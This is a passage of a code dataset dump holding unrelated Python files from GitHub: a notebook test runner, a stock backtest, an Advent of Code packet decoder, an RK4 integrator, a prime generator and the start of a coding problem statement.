----------\n path : str\n Location of notebook to run.\n\n microbatch : int or None\n If None, then no microbatch is applied.\n If int, then size of microbatch used.\n\n device : str or None\n If None, then default device behaviour is used.\n If str, then any option of device configuration from :class:`.torch.TorchModel` is supported.\n\n Notes\n -----\n `device` is moved to separate parameter in order to work properly with `parametrize`.\n \"\"\"\n # pylint: disable=exec-used\n if path.startswith(TUTORIALS_DIR) and 'CPU' not in device:\n pytest.skip(\"Tutorials don't utilize device config.\")\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n from nbconvert import PythonExporter\n code, _ = PythonExporter().from_filename(path)\n\n code_ = []\n for line in code.split('\\n'):\n if not line.startswith('#'):\n flag = sum([name in line for name in BAD_PREFIXES])\n if flag == 0:\n code_.append(line)\n\n code = '\\n'.join(code_)\n 
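# run the cleaned notebook source, exposing the test parameters as globals\n 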
exec(code, {'MICROBATCH': microbatch, 'DEVICE': device})\n","repo_name":"analysiscenter/batchflow","sub_path":"batchflow/tests/notebooks_test.py","file_name":"notebooks_test.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":194,"dataset":"github-code","pt":"21"} +{"seq_id":"41388577116","text":"import numpy as np\n\n## Takes a vector of action values and returns a vector of\n## probabilities, with the probability spread evenly over the\n## optimal actions\ndef optimalize(value_array):\n best = np.flatnonzero(value_array == value_array.max())\n ret = np.array([1/len(best) if (x == value_array.max()) \\\n else 0.0 for x in value_array])\n return ret\n","repo_name":"BibarelUsedFly/reinforcement-learning","sub_path":"dynamic programming/Reinforce.py","file_name":"Reinforce.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19637600262","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 26 11:20:01 2022\n\n@author: Richard\n\"\"\"\n\nimport yfinance as yf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nimport math\nfrom datetime import date\n\n#get prices from yahoo finance\n\ntday = date.today()\ntday_str = tday.strftime(\"%Y-%m-%d\")\n\ntickers = \"EVO.ST \"\\\n\"ORRON.ST \"\\\n\"INVE-B.ST \"\\\n\"HM-B.ST \"\\\n\"ERIC-B.ST \"\\\n\"NDA-SE.ST \"\\\n\"AZN.ST \"\\\n\"VOLV-B.ST \"\\\n\"GETI-B.ST \"\\\n\"SAND.ST \"\\\n\"SWMA.ST \"\\\n\"ATCO-A.ST \"\\\n\"SWED-A.ST \"\\\n\"BOL.ST \"\\\n\"ESSITY-B.ST \"\\\n\"SEB-A.ST \"\\\n\"EMBRAC-B.ST \"\\\n\"SINCH.ST \"\\\n\"ASSA-B.ST \"\\\n\"HEXA-B.ST \"\\\n\"ABB.ST \"\\\n\"NIBE-B.ST \"\\\n\"EQT.ST \"\\\n\"SKF-B.ST \"\\\n\"VOLCAR-B.ST \"\\\n\"ELUX-B.ST \"\\\n\"TELIA.ST \"\\\n\"SBB-B.ST \"\\\n\"SHB-A.ST \"\\\n\"LIFCO-B.ST \"\\\n\"SAGA-B.ST \"\\\n\"TEL2-B.ST \"\\\n\"ALFA.ST \"\\\n\"ATCO-B.ST \"\\\n\"CAST.ST \"\\\n\"ONCO.ST \"\\\n\"SSAB-B.ST \"\\\n\"SCA-B.ST \"\\\n\"ALIV-SDB.ST \"\\\n\"KINV-B.ST \"\\\n\"EPI-A.ST \"\\\n\"HUSQ-B.ST \"\\\n\"SKA-B.ST \"\\\n\"SF.ST \"\\\n\"BALD-B.ST \"\\\n\"SOBI.ST \"\\\n\"TIGO-SDB.ST \"\\\n\"NIVI-B.ST \"\\\n\"HTRO.ST \"\\\n\"TREL-B.ST \"\\\n\"SECU-B.ST \"\\\n\"INDU-C.ST \"\\\n\"EKTA-B.ST \"\\\n\"KIND-SDB.ST \"\\\n\"SSAB-A.ST \"\\\n\"LUND-B.ST \"\\\n\"AZA.ST \"\\\n\"LATO-B.ST \"\\\n\"SAVE.ST \"\\\n\"EPI-B.ST \"\\\n\"STOR-B.ST \"\\\n\"AXFO.ST \"\\\n\"PCELL.ST \"\\\n\"KLARA-B.ST \"\\\n\"SHOT.ST \"\\\n\"DOM.ST \"\\\n\"SECT-B.ST \"\\\n\"INDT.ST \"\\\n\"BICO.ST \"\\\n\"ADDT-B.ST \"\\\n\"BILL.ST \"\\\n\"CTEK.ST \"\\\n\"TRUE-B.ST \"\\\n\"THULE.ST \"\\\n\"FABG.ST \"\\\n\"HOLM-B.ST \"\\\n\"HUFV-A.ST \"\\\n\"ALIF-B.ST \"\\\n\"INTRUM.ST \"\\\n\"KAMBI.ST \"\\\n\"SAS.ST \"\\\n\"MIPS.ST \"\\\n\"FING-B.ST \"\\\n\"VESTUM.ST \"\\\n\"AAK.ST \"\\\n\"VITR.ST \"\\\n\"WIHL.ST \"\\\n\"HUMBLE.ST \"\\\n\"BHG.ST \"\\\n\"JM.ST \"\\\n\"AEGIR.ST \"\\\n\"INSTAL.ST \"\\\n\"BEIJ-B.ST \"\\\n\"SAAB-B.ST \"\\\n\"HPOL-B.ST \"\\\n\"CTM.ST \"\\\n\"STORY-B.ST \"\\\n\"BOOZT.ST \"\\\n\"CIBUS.ST \"\\\n\"LIAB.ST \"\\\n\"NYF.ST \"\\\n\"VNV.ST \"\\\n\"WALL-B.ST \"\\\n\"STE-R.ST \"\\\n\"CINT.ST \"\\\n\"BETS-B.ST \"\\\n\"SWEC-B.ST \"\\\n\"NETI-B.ST \"\\\n\"HEM.ST \"\\\n\"VIT-B.ST \"\\\n\"VIMIAN.ST \"\\\n\"BURE.ST \"\\\n\"RATO-B.ST \"\\\n\"DIOS.ST \"\\\n\"PNDX-B.ST \"\\\n\"LOOMIS.ST \"\\\n\"AFRY.ST \"\\\n\"LUMI.ST \"\\\n\"SUS.ST \"\\\n\"PDX.ST \"\\\n\"NEWA-B.ST \"\\\n\"NCC-B.ST \"\\\n\"SECARE.ST \"\\\n\"ARJO-B.ST \"\\\n\"ATRLJ-B.ST 
\"\\\n\"CORE-B.ST \"\\\n\"COOR.ST \"\\\n\"MEKO.ST \"\\\n\"BMAX.ST \"\\\n\"SDIP-B.ST \"\\\n\"IPCO.ST \"\\\n\"CATE.ST \"\\\n\"CALTX.ST \"\\\n\"TROAX.ST \"\\\n\"NOLA-B.ST \"\\\n\"LOGI-B.ST \"\\\n\"BUFAB.ST \"\\\n\"LAGR-B.ST \"\\\n\"SKIS-B.ST \"\\\n\"MTG-B.ST \"\\\n\"PEAB-B.ST \"\\\n\"MYCR.ST \"\\\n\"CLAS-B.ST \"\\\n\"SYNSAM.ST \"\\\n\"AOI.ST \"\\\n\"HMS.ST \"\\\n\"ANOD-B.ST \"\\\n\"BRAV.ST \"\\\n\"SVOL-B.ST \"\\\n\"BILI-A.ST \"\\\n\"BIOT.ST \"\\\n\"TOBII.ST \"\\\n\"RESURS.ST \"\\\n\"SCST.ST \"\\\n\"G5EN.ST \"\\\n\"RVRC.ST \"\\\n\"BONAV-B.ST \"\\\n\"GRNG.ST \"\\\n\"NOBI.ST \"\\\n\"BETCO.ST \"\\\n\"NCAB.ST \"\\\n\"VOLO.ST \"\\\n\"JOMA.ST \"\\\n\"INWI.ST \"\\\n\"EOLU-B.ST \"\\\n\"MTRS.ST \"\\\n\"HNSA.ST \"\\\n\"CRED-A.ST \"\\\n\"EXS.ST \"\\\n\"NOTE.ST \"\\\n\"NP3.ST \"\\\n\"GARO.ST \"\\\n\"BIOA-B.ST \"\\\n\"RENEW.ST \"\\\n\"FNM.ST \"\\\n\"OX2.ST \"\\\n\"CLA-B.ST \"\\\n\"SEYE.ST \"\\\n\"MCOV-B.ST \"\\\n\"EPRO-B.ST \"\\\n\"DSNO.ST \"\\\n\"COIC.ST \"\\\n\"COALA.ST \"\\\n\"ENQ.ST \"\\\n\"DUST.ST \"\\\n\"BALCO.ST \"\\\n\"TRANS.ST \"\\\n\"AMBEA.ST \"\\\n\"COLL.ST \"\\\n\"KNOW.ST \"\\\n\"TETY.ST \"\\\n\"SOLT.ST \"\\\n\"CAMX.ST \"\\\n\"ATT.ST \"\\\n\"AAC.ST \"\\\n\"ALIG.ST \"\\\n\"8TRA.ST \"\\\n\"ACAD.ST \"\\\n\"GENO.ST \"\\\n\"CANTA.ST \"\\\n\"BEIA-B.ST \"\\\n\"SIGNUP.ST \"\\\n\"BFG.ST \"\\\n\"FG.ST \"\\\n\"IVACC.ST \"\\\n\"EG7.ST \"\\\n\"SEDANA.ST \"\\\n\"ACCON.ST \"\\\n\"NWG.ST \"\\\n\"ACAST.ST \"\\\n\"XVIVO.ST \"\\\n\"OEM-B.ST \"\\\n\"BONEX.ST \"\\\n\"SIVE.ST \"\\\n\"THUNDR.ST \"\\\n\"AZELIO.ST \"\\\n\"CEVI.ST \"\\\n\"HANZA.ST \"\\\n\"BERG-B.ST \"\\\n\"TFBANK.ST \"\\\n\"ASAB.ST \"\\\n\"BRG-B.ST \"\\\n\"BULTEN.ST \"\\\n\"BIOG-B.ST \"\\\n\"BUSER.ST \"\\\n\"KFAST-B.ST \"\\\n\"IMP-A-SDB.ST \"\\\n\"FLAT-B.ST \"\\\n\"KAR.ST \"\\\n\"IMMNOV.ST \"\\\n\"DOXA.ST \"\\\n\"LUG.ST \"\\\n\"CS.ST \"\\\n\"GREEN.ST \"\\\n\"READ.ST \"\\\n\"PRIC-B.ST \"\\\n\"MAHA-A.ST \"\\\n\"HUM.ST \"\\\n\"BTS-B.ST \"\\\n\"FASTAT.ST \"\\\n\"STEF-B.ST \"\\\n\"FPIP.ST \"\\\n\"VEFAB.ST \"\\\n\"CAT-B.ST \"\\\n\"FAG.ST \"\\\n\"CDON.ST \"\\\n\"LINC.ST \"\\\n\"MCAP.ST \"\\\n\"HOFI.ST \"\\\n\"RAY-B.ST \"\\\n\"EAST.ST \"\\\n\"DUNI.ST \"\\\n\"IDUN-B.ST \"\\\n\"PLAZ-B.ST \"\\\n\"BEGR.ST \"\\\n\"AWRD.ST \"\\\n\"ENGCON-B.ST \"\\\n\"EQT.ST \" \\\n\"VPLAY-B.ST \"\\\n\"AQ.ST \" \\\n\"ARION-SDB.ST \" \\\n\"BACTI-B.ST \" \\\n\"BESQ.ST \" \\\n\"BRIN-B.ST \" \\\n\"CCC.ST \" \\\n\"COALA.ST \" \\\n\"CTT.ST \" \\\n\"ELAN-B.ST \" \\\n\"ELTEL.ST \" \\\n\"ENEA.ST \" \\\n\"FOI-B.ST \" \\\n\"HEBA-B.ST \" \\\n\"IAR-B.ST \" \\\n\"IVSO.ST \" \\\n\"LIME.ST \" \\\n\"LUC.ST \" \\\n\"MMGR-B.ST \" \\\n\"NMAN.ST \" \\\n\"NPAPER.ST \" \\\n\"ORES.ST \" \\\n\"PACT.ST \" \\\n\"PROB.ST \" \\\n\"QLINEA.ST \" \\\n\"REJL-B.ST \" \\\n\"RROS.ST \" \\\n\"SYSR.ST \" \\\n\"TIETOS.ST \" \\\n\"TRAC-B.ST \" \\\n\"TRIAN-B.ST \" \\\n\"VBG-B.ST \" \\\n\"XANO-B.ST \" \\\n\"CINIS.ST \" \\\n\"MSON-B.ST \" \\\n\"EMIL-B.ST \" \\\n\"SLP-B.ST \" \\\n\"4C.ST \" \\\n\"XSPRAY.ST\"\n\n\n#=============================================================================\n# ============================================================================\nhist = yf.download(tickers, start='2015-01-01', end=tday_str)\n# ============================================================================\n#=============================================================================\n\n\nclose_prices = hist[\"Adj Close\"]#.dropna(how='all').fillna(0)\nvolumes = hist[\"Volume\"].dropna(how='all').fillna(0)\n\nr_vol=volumes/volumes.rolling(20).mean().shift(1)\n\n\n#add current price\n#close_prices = 
close_prices.drop('2020-01-01')\n# =============================================================================\n# =============================================================================\n# index = close_prices.index.append(pd.Index([tday]))\n# \n# close_prices = close_prices.append(pd.Series(), ignore_index=True)\n# close_prices=close_prices.set_index(index)\n# \n# re_names_df = re_names.split(\" \")\n# for x in re_names_df:\n# stock_data = yf.Ticker(x)\n# curr_mid = (stock_data.info[\"bid\"] + stock_data.info[\"ask\"])/2\n# close_prices.loc[close_prices.tail(1).index,x] = curr_mid\n# =============================================================================\n\n# =============================================================================\n\n#calculate daily returns\nret_daily = close_prices.pct_change()\nvol_daily = ret_daily.rolling(60).std().shift(1)\n\n\n#create binary dataframe to select stocks with big move large volume days in the last n sessions\nlong_ind = (r_vol > 3) & (ret_daily > 0) & (ret_daily < 0.08)\n \n# #create position indicator df\n# long_ind = significant_days.shift(1)\n\n#long_ind = (ret_5d < 0) \n#replace false with NaN to avoid 0s impacting the mean\nlong_ind = long_ind.replace(False, np.nan)\n\n\nshort_ind = (r_vol > 3.5) & (ret_daily < -0.1) & (ret_daily > -0.3)\nshort_ind = short_ind.replace(False, np.nan)\n\n\n\n#calc transaction cost\nn_trans = long_ind.sum().sum() #+ short_ind.sum().sum()\n\ntrans_value = n_trans*100000\ntotal_trans_cost = n_trans*29\n\ntrans_proc_fee = total_trans_cost/trans_value\n\n\nlong_returns_daily = 1*(ret_daily)*long_ind.shift(1)\nshort_returns_daily = -1*(ret_daily+2*trans_proc_fee)*short_ind.shift(1)\n\n\n#daily returns of long short strategy\n#avg_long_ret = starting_capital*long_returns_daily.mean(axis=1)-transaction_cost\navg_long_ret = long_returns_daily[long_returns_daily!=0].mean(axis=1)#-2*trans_proc_fee\n\n#strat_vol = avg_long_ret.shift(1).rolling(20).std()\n\navg_short_ret = short_returns_daily[short_returns_daily!=0].mean(axis=1)#-2*trans_proc_fee\ndaily_returns_strat =avg_long_ret.dropna(how='all').fillna(0) #+ avg_short_ret.dropna(how='all').fillna(0)#\ndaily_returns_strat = daily_returns_strat.fillna(0)\n#avg_daily_rets = daily_returns_strat.mean(axis=1)\n\n#Cumulative returns \n#cum_ret =starting_capital + np.cumsum(daily_returns_strat) #\ncum_ret =(1 + daily_returns_strat).cumprod()\n#cum_long_ret = (1 + avg_long_ret).cumprod()\n#cum_short_ret = (1 + avg_short_ret).cumprod()\n\n##########################################\n#stats for basic strategy\n##########################################\n\nprint(\"Basic strategy: \")\nprint('Significant day effect ')\nmean_ret = cum_ret.tail(1)**(1/8)-1\nprint(\"CAGR \" + str(mean_ret[0]))\nvol = (daily_returns_strat.std()*math.sqrt(252))\nsharpe = mean_ret/vol\nkelly_f = mean_ret/vol**2\nprint(\"Volatility \" + str(vol))\nprint(\"Sharpe \" + str(sharpe[0]))\nprint(\"Kelly fraction \" + str(kelly_f[0]))\n#maximum drawdown\nRoll_Max = cum_ret.cummax()\nDaily_Drawdown = cum_ret/Roll_Max - 1.0\nMax_Daily_Drawdown = Daily_Drawdown.cummin()\nprint(\"Max drawdown \" + str(Max_Daily_Drawdown.tail(1)[0]))\n\n#plots\nplt.plot(cum_ret)\n#plt.plot(cum_long_ret)\n#plt.plot(cum_short_ret)\n#plt.plot(Daily_Drawdown)\n\n\n###################################################\n#modified strategy considering factor momentum\n####################################################\n\n#calculate rolling sharpe ratio of basic strategy\n#rolling_vol = 
daily_returns_strat.shift(1).rolling(100).std()\n#rolling_return = cum_ret.pct_change(100).shift(1)\n#strat_rolling_sharpe = rolling_return/rolling_vol\n\nmom_cum_ret = (1+daily_returns_strat[cum_ret.pct_change(40).shift(1) > 0]).cumprod()\n#mom_cum_ret = (1+daily_returns_strat[strat_rolling_sharpe > 0.5]).cumprod()\n#mom_cum_ret = starting_capital + np.cumsum(daily_returns_strat[cum_ret.pct_change(20).shift(1) > 0])\nmom_daily_ret_RE = mom_cum_ret.pct_change()\n\nmom_mean_ret = mom_cum_ret.tail(1)**(1/8)-1\n\nmom_vol = (daily_returns_strat[cum_ret.pct_change(40).shift(1) > 0].std()*math.sqrt(252))\nmom_sharpe = mom_mean_ret/mom_vol\nmom_kelly_f = mom_mean_ret/mom_vol**2\n\n#maximum drawdown\nmom_Roll_Max = mom_cum_ret.cummax()\nmom_Daily_Drawdown = mom_cum_ret/mom_Roll_Max - 1.0\nmom_Max_Daily_Drawdown = mom_Daily_Drawdown.cummin()\nprint(\" \")\nprint(\"Factor momentum: \")\nprint('Significant day effect with momentum ')\nprint(\"CAGR \" + str(mom_mean_ret[0]))\nprint(\"Volatility \" + str(mom_vol))\n\nprint(\"Sharpe \" + str(mom_sharpe[0]))\nprint(\"Kelly fraction \" + str(mom_kelly_f[0]))\n#maximum drawdown\nRoll_Max = cum_ret.cummax()\nDaily_Drawdown = cum_ret/Roll_Max - 1.0\nMax_Daily_Drawdown = Daily_Drawdown.cummin()\nprint(\"Max drawdown \" + str(mom_Max_Daily_Drawdown.tail(1)[0]))\n\n#calculate log returns of the significant-day momentum strategy and print returns per year\nmom_log_ret_RE = np.log(mom_cum_ret)-np.log(mom_cum_ret.shift(1))\nper = mom_log_ret_RE.index.to_period(\"Y\")\ng = mom_log_ret_RE.groupby(per)\nret_per_year = g.sum()\nprint(\" \")\nprint(\"significant day effect with factor momentum returns per year\")\nprint(ret_per_year)\n\n\nper_M = mom_log_ret_RE.index.to_period(\"M\")\ngrouping_month = mom_log_ret_RE.groupby(per_M)\nret_per_month = grouping_month.sum()\n#stats for monthly returns\npercent_positive = ret_per_month[ret_per_month>0].count()/ret_per_month.count()\nprint(\"\")\nprint(\"percent positive months \" + str(percent_positive))\n\n\nplt.plot(mom_cum_ret)\n\n################\n#buy and hold\n#################\n\navg_ret_boh= ret_daily.mean(axis=1)\ncum_ret_boh = (1 + avg_ret_boh).cumprod()\n#avg_ret_boh= starting_capital*ret_daily.mean(axis=1)\n#cum_ret_boh = starting_capital + np.cumsum(avg_ret_boh)\nplt.plot(cum_ret_boh)\n\n#stats buy and hold\nprint(\" Buy and Hold \")\nprint('Buy and hold stats')\nboh_mean_ret = cum_ret_boh.tail(1)**(1/8)-1\nboh_vol = (avg_ret_boh.std()*math.sqrt(252))\nboh_sharpe = boh_mean_ret/boh_vol\nboh_kelly_f = boh_mean_ret/boh_vol**2\n\n#maximum drawdown\nboh_Roll_Max = cum_ret_boh.cummax()\nboh_Daily_Drawdown = cum_ret_boh/boh_Roll_Max - 1.0\nboh_Max_Daily_Drawdown = boh_Daily_Drawdown.cummin()\n\nprint(\"CAGR \" + str(boh_mean_ret[0]))\nprint(\"Volatility \" + str(boh_vol))\n\nprint(\"Sharpe \" + str(boh_sharpe[0]))\nprint(\"Kelly fraction \" + str(boh_kelly_f[0]))\n\nprint(\"Max drawdown \" + str(boh_Max_Daily_Drawdown.tail(1)[0]))\n\n\nprint(\" \")\nprint('40-day momentum of significant day effect strategy')\nprint(cum_ret.pct_change(40).tail(1))\n\n","repo_name":"RS1987X/Significant-day-effect","sub_path":"post significant day return large mid caps.py","file_name":"post significant day return large mid caps.py","file_ext":"py","file_size_in_byte":11168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25169679415","text":"#!/usr/bin/env python3\n\nimport cairo\nimport math\nfrom aoc import check_solution, save_solution, test_eq\n\nDAY = 16\n\n\ndef 
get_input(filename):\n with open(filename, 'r') as input_file:\n lines = input_file.read()\n return lines.splitlines()\n\n\nHEX_TO_BIN = {\n '0': '0000',\n '1': '0001',\n '2': '0010',\n '3': '0011',\n '4': '0100',\n '5': '0101',\n '6': '0110',\n '7': '0111',\n '8': '1000',\n '9': '1001',\n 'A': '1010',\n 'B': '1011',\n 'C': '1100',\n 'D': '1101',\n 'E': '1110',\n 'F': '1111',\n}\n\n\ndef to_binary(packet):\n binary = []\n print(packet)\n for char in packet:\n binary.append(HEX_TO_BIN[char])\n return \"\".join(binary)\n\n\ndef to_num(binary):\n num = 0\n for bit in binary:\n num *= 2\n if bit == '1':\n num += 1\n return num\n\n\ndef parse_literal(bmsg, pos):\n last = False\n literal_value = []\n while not last:\n if bmsg[pos] == '0':\n last = True\n literal_value.append(bmsg[pos+1:pos+5])\n pos += 5\n return to_num(\"\".join(literal_value)), pos\n\n\ndef parse_operator(bmsg, pos, packet):\n packet['lenght_type_id'] = to_num(bmsg[pos])\n if packet['lenght_type_id'] == 0:\n packet['subpackets_bit_length'] = to_num(bmsg[pos + 1:pos + 16])\n pos += 16\n parse_to = pos + packet['subpackets_bit_length']\n # print(pos, parse_to)\n while pos < parse_to:\n subpacket, pos = parse_packet(bmsg, pos)\n packet['subpackets'].append(subpacket)\n # print(pos, parse_to)\n else:\n packet['subpackets_num'] = to_num(bmsg[pos + 1:pos + 12])\n # print(bmsg[pos + 1:pos + 12])\n pos += 12\n for _ in range(packet['subpackets_num']):\n subpacket, pos = parse_packet(bmsg, pos)\n packet['subpackets'].append(subpacket)\n # print(pos, num_packet)\n\n calc_value(packet)\n return packet['value'], pos\n\n\ndef multiply_packet_values(packets):\n prod = 1\n for packet in packets:\n prod *= packet['value']\n return prod\n\n\ndef packet_greater(packets):\n if packets[0]['value'] > packets[1]['value']:\n return 1\n return 0\n\n\ndef packet_less(packets):\n if packets[0]['value'] < packets[1]['value']:\n return 1\n return 0\n\n\ndef packet_equal(packets):\n if packets[0]['value'] == packets[1]['value']:\n return 1\n return 0\n\n\ndef calc_value(packet):\n packet_type_operation = {\n 0: lambda packets: sum([packet['value'] for packet in packets]),\n 1: multiply_packet_values,\n 2: lambda packets: min([packet['value'] for packet in packets]),\n 3: lambda packets: max([packet['value'] for packet in packets]),\n 5: packet_greater,\n 6: packet_less,\n 7: packet_equal,\n }\n subpackets = packet['subpackets']\n packet['value'] = packet_type_operation[packet['type_id']](subpackets)\n return packet['value']\n\n\ndef parse_packet(bmsg, pos):\n packet = {'subpackets': []}\n packet['version'] = to_num(bmsg[pos:pos + 3])\n packet['type_id'] = to_num(bmsg[pos + 3:pos + 6])\n pos += 6\n if packet['type_id'] == 4:\n packet['value'], pos = parse_literal(bmsg, pos)\n else:\n _value, pos = parse_operator(bmsg, pos, packet)\n return packet, pos\n\n\ndef sum_versions(packet):\n versions = packet['version']\n for subpacket in packet['subpackets']:\n versions += sum_versions(subpacket)\n return versions\n\n\ndef draw_packets(packet):\n surface = cairo.SVGSurface('images/day16.svg', 1900, 1800)\n ctx = cairo.Context(surface)\n ctx.select_font_face('Sans Serif')\n ctx.set_font_size(12)\n\n ctx.set_source_rgb(0.9, 0.9, 0.8)\n ctx.rectangle(1, 1, 1899, 1299)\n ctx.fill()\n draw_packet(ctx, packet, 950, 30, 1800)\n\n surface.flush()\n surface.finish()\n\n\ndef draw_packet(ctx, packet, x, y, width):\n num_sp = len(packet['subpackets'])\n if num_sp != 0:\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n ctx.set_line_width(1)\n step_len = width / (num_sp + 1)\n for i, 
subpacket in enumerate(packet['subpackets']):\n ctx.move_to(x, y)\n next_x = x - (num_sp / 2 - i) * step_len\n next_y = y + math.pow(width, 0.3) * 50\n ctx.line_to(next_x, next_y)\n ctx.stroke()\n draw_packet(ctx, subpacket, next_x, next_y, step_len)\n ctx.set_source_rgb(1.0, 1.0, 1.0)\n ctx.arc(x, y, 20, 0, 2 * math.pi)\n ctx.fill()\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n ctx.arc(x, y, 20, 0, 2 * math.pi)\n ctx.stroke()\n ctx.move_to(x - 10, y - 2)\n type_sym = ['+', '*', 'mn', 'mx', 'v', '>', '<', '=']\n ctx.show_text(f\"{type_sym[packet['type_id']]}\")\n ctx.move_to(x - 17, y + 10)\n ctx.show_text(f\"{packet['value']}\")\n\n\ndef part1(data):\n binary = to_binary(data[0])\n packet, _pos = parse_packet(binary, 0)\n # print(packet, pos, binary[pos:])\n return sum_versions(packet)\n\n\ndef part2(data):\n binary = to_binary(data[0])\n packet, _pos = parse_packet(binary, 0)\n draw_packets(packet)\n return packet['value']\n\n\ndef run_tests():\n test_input_1 = get_input(f'ex{DAY}')\n print('Test Part 1:')\n test_eq('Test 1.1', part1, 6, test_input_1)\n test_eq('Test 1.2', part1, 9, get_input('ex16_2'))\n test_eq('Test 1.3', part1, 14, get_input('ex16_22'))\n test_eq('Test 1.4', part1, 16, get_input('ex16_3'))\n test_eq('Test 1.5', part1, 12, get_input('ex16_4'))\n test_eq('Test 1.6', part1, 23, get_input('ex16_5'))\n test_eq('Test 1.7', part1, 31, get_input('ex16_6'))\n print()\n\n print('Test Part 2:')\n test_eq('Test 2.1', part2, 3, ['C200B40A82'])\n test_eq('Test 2.2', part2, 54, ['04005AC33890'])\n test_eq('Test 2.3', part2, 7, ['880086C3E88112'])\n test_eq('Test 2.4', part2, 9, ['CE00C43D881120'])\n test_eq('Test 2.5', part2, 1, ['D8005AC2A8F0'])\n test_eq('Test 2.6', part2, 0, ['F600BC2D8F'])\n test_eq('Test 2.7', part2, 0, ['9C005AC2F8F0'])\n test_eq('Test 2.8', part2, 1, ['9C0141080250320F1802104A08'])\n print()\n\n\ndef run_part1(solved):\n data = get_input(f'input{DAY}')\n\n result1 = part1(data)\n print('Part 1:', result1)\n if solved:\n check_solution(DAY, 1, result1)\n else:\n save_solution(DAY, 1, result1)\n\n\ndef run_part2(solved):\n data = get_input(f'input{DAY}')\n\n result2 = part2(data)\n print('Part 2:', result2)\n if solved:\n check_solution(DAY, 2, result2)\n else:\n save_solution(DAY, 2, result2)\n\n\ndef main():\n run_tests()\n run_part1(True)\n run_part2(True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"remowxdx/AoC-2021","sub_path":"aoc16.py","file_name":"aoc16.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"72824813172","text":"__all__ = ['dynamics_RK4']\n\nimport numpy as onp\n\ndef dynamics_RK4(OdeFun, tspan, x, u, v):\n \"\"\"\n # RK4 integrator for a time-invariant dynamical system under a control, u,\n and disturbance, v.\n\n # See https://lpsa.swarthmore.edu/NumInt/NumIntFourth.html\n\n This implementation was adapted from unstable-zeros's learning CBFs example for two airplanes\n\n https://github.com/unstable-zeros/learning-cbfs/blob/master/airplane_example/learning_cbfs_airplane.ipynb\n\n This function must be called within a loop for a total of N\n steps of integration. Obviously, the smaller the value of T, the better\n\n Inputs:\n OdeFun: Right Hand Side of Ode function to be integrated\n tspan: A list [start, end] that specifies over what time horizon to integrate the dynamics\n x: State, must be a list, initial condition\n u: Control, must be a list\n v: Disturbance, must be a list\n\n Author: Lekan Molu, August 09, 2021\n \"\"\"\n M = 4 # RK4 steps per interval\n h = 0.2 # time step\n if onp.any(tspan):\n hh = (tspan[1]-tspan[0])/10/M\n X = onp.array(x)\n U = onp.array(u)\n V = onp.array(v)\n\n for j in range(M):\n if onp.any(tspan): # integrate for this much time steps\n for h in onp.arange(tspan[0], tspan[1], hh): # numpy is imported as onp above\n k1 = OdeFun(X, U, V)\n k2 = OdeFun(X + h/2 * k1, U, V)\n k3 = OdeFun(X + h/2 * k2, U, V)\n k4 = OdeFun(X + h * k3, U, V)\n\n X = X+(h/6)*(k1 +2*k2 +2*k3 +k4)\n else:\n k1 = OdeFun(X, U, V)\n k2 = OdeFun(X + h/2 * k1, U, V)\n k3 = OdeFun(X + h/2 * k2, U, V)\n k4 = OdeFun(X + h * k3, U, V)\n\n X = X+(h/6)*(k1 +2*k2 +2*k3 +k4)\n\n return list(X)\n","repo_name":"IgiArdiyanto/LevelSetPy","sub_path":"ExplicitIntegration/Integration/runge_kutta4.py","file_name":"runge_kutta4.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"38957048454","text":"# Contains the definition of the is_prime function\nfrom math import sqrt\n\ndef is_prime(n):\n \"\"\" Returns True if nonnegative integer n is prime; \n otherwise, returns False \"\"\"\n if n == 2: # 2 is the only even prime number\n return True\n if n < 2 or n % 2 == 0: # Handle simple cases immediately\n return False # No evens and nothing less than 2\n trial_factor = 3\n root = sqrt(n)\n while trial_factor <= root:\n if n % trial_factor == 0: # Is trial factor a factor?\n return False # Yes, return right away\n trial_factor += 2 # Next potential factor, skip evens\n return True # Tried them all, must be prime\n\n\ndef prime_sequence(begin, end):\n \"\"\" Generates the sequence of prime numbers between begin and end. \"\"\"\n for value in range(begin, end + 1):\n if is_prime(value): # See if value is prime\n yield value # Produce the prime number\n\n\ndef main():\n \"\"\" Experiments with the prime number generator \"\"\"\n min_value = int(input(\"Enter start of range: \"))\n max_value = int(input(\"Enter last of range: \"))\n\n print('Print all the primes from', min_value, 'to', max_value)\n for value in prime_sequence(min_value, max_value):\n print(value, end=' ') # Display the prime number\n print() # Move cursor down to next line\n\n print('Print all the primes in that range that end with digit 3')\n for value in prime_sequence(min_value, max_value):\n if value % 10 == 3: # See if value's ones digit is 3\n print(value, end=' ') # Display the number\n print() # Move cursor down to next line\n\n # Add up all the primes in the range\n sum = 0\n for value in prime_sequence(min_value, max_value):\n sum += value\n print('The sum of the primes in that range is', sum)\n\n # Decorate the output\n print('Fancier display')\n for value in prime_sequence(min_value, max_value):\n print('<' + str(value) + '>', end='')\n\n\nif __name__ == '__main__':\n main() # Run the program\n","repo_name":"halterman/PythonBook-SourceCode","sub_path":"Chap8/generatedprimes.py","file_name":"generatedprimes.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"21"}
{"seq_id":"31264267066","text":"''' https://www.acmicpc.net/problem/20053\t최소, 최대 2\t\t\n문제\nN개의 정수가 주어진다. 이때, 최솟값과 최댓값을 구하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에 테스트 케이스의 개수 T (1 ≤ T ≤ 10)\ntc의 첫째 줄에 정수의 개수 N (1 ≤ N ≤ 1,000,000)이 주어진다. \ntc 둘째 줄에는 N개의 정수를 공백으로 구분해서 주어진다. 
